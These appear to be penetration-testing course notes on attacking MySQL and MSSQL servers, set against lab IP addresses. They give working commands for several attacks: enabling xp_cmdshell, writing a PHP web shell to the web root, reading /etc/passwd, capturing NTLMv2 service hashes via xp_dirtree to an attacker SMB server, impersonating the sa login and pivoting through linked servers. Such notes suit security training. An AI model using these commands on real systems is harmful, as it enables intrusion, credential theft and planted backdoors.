MySQL and Microsoft Sql Server (MSSQL) are relational database management systems. Databases usually store sensitive data so they are high targets.

MSSQL uses ports TCP/1433 and UDP/1434 and can sometimes operate in hidden mode on port TCP/2433. MySQL uses TCP/3306.

MSSQL supports two authentication modes:

  • Windows authentication mode, the SQL server is integrated with AD.
  • Mixed mode supports AD and also Username and password pairs.

MySQL supports:

  • username and password
  • Windows authentication (via plugin)
  • etc.

Misconfigurations in SQL servers can allow us to access the service without credentials.

Connect to SQL Servers

Use the right client for the database and authentication type.

# mysql conntect to server
mysql -u julio -pPassword123 -h 10.129.20.13
 
# mssql connect to server
sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
# or from linux
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h
# or via impacket
mssqlclient.py -p 1433 julio@10.129.203.7 
 
# authentication via a windows domain
sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

Database Navigation

Use these commands after login to list databases, select a database, list tables, and dump records.

SHOW DATABASES;
 
-- if using sqlcmd
SELECT name FROM master.dbo.sysdatabases
GO
 
-- select database
USE htbusers;
 
--- sqlcmd
USE htbusers
GO
 
-- show tables
SHOW TABLES;
 
-- sqlcmd
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
GO
 
-- select all data
SELECT * FROM users;

MySQL default system schemas/databases:

  • mysql - is the system database that contains tables that store information required by the MySQL server
  • information_schema - provides access to database metadata
  • performance_schema - is a feature for monitoring MySQL Server execution at a low level
  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

MSSQL default system schemas/databases:

  • master - keeps the information for an instance of SQL Server.
  • msdb - used by SQL Server Agent.
  • model - a template database copied for each new database.
  • resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
  • tempdb - keeps temporary objects for SQL queries.

MSSQL Command Execution

MSSQL support an extended stored procedure called xp_cmdshell that allows execution of system commands.

-- code execution on MSSQL
xp_cmdshell 'whoami'
GO
 
-- enable xp_cmdshell
-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO
 
-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  
 
-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  
 
-- To update the currently configured value for this feature.  
RECONFIGURE
GO

MySQL Web Shell Write

MySQL does not support xp_cmdshell but we can achieve command execution if we write to a location in the file system that can execute our commands. However a system variable secure_file_priv limits the effect of data import and export operations.

-- mySQL command execution
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'
 
-- MySQL secure File privileges
show variables like "secure_file_priv";

MSSQL OLE File Write

Use Ole Automation Procedures when enabled to write a file through MSSQL.

-- Enable Ole Automation Procedures on MSSQL
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
 
-- Create a file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO

Read Local Files

Use database file-read features when permissions allow it.

-- read local files in MSSQL
1> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
2> GO
 
-- read local files in mysql
mysql> select LOAD_FILE("/etc/passwd");

Capture MSSQL Service Hash

We can steal MSSQL service hash using xp_subdirs or xp_dirtree, which use the SMB protocol to retrieve a list of child directrories under a specified parent directory from the file system.

THis authenticates to an SMB server, and forces the server to authenticate and send the NTLMv2 hash of the service account.

-- XP_DIRTREE hash stealing
1> EXEC master..xp_dirtree  '\\10.10.110.17\share\ '
2> GO
 
-- XP_SUBDIRS hash stealing
1> EXEC master..xp_subdirs '\\10.10.110.17\share\ '
2> GO
# must have an attacker controlled SMB server
sudo responder -I tun0
sudo impacket-smbserver share ./ -smb2support

Impersonate Users via MSSQL

SQL Server may have a special permission named IMPERSONATE that allows the executing user to take on the permissions of another user or login.

1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
 
-- verify current role
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
 
-- impersonating the SA user
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO

Communicate with Other databases via MSSQL

MSSQL has a configured option called linked servers. Linked servers are typically configured to enabled the database engine to execute a Transact-SQL statement that include tables in another instance of SQL Server. We may be able to move laterally to another SQL server.

--- list linked servers
1> SELECT srvname, isremote FROM sysservers
2> GO
 
-- command execution
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO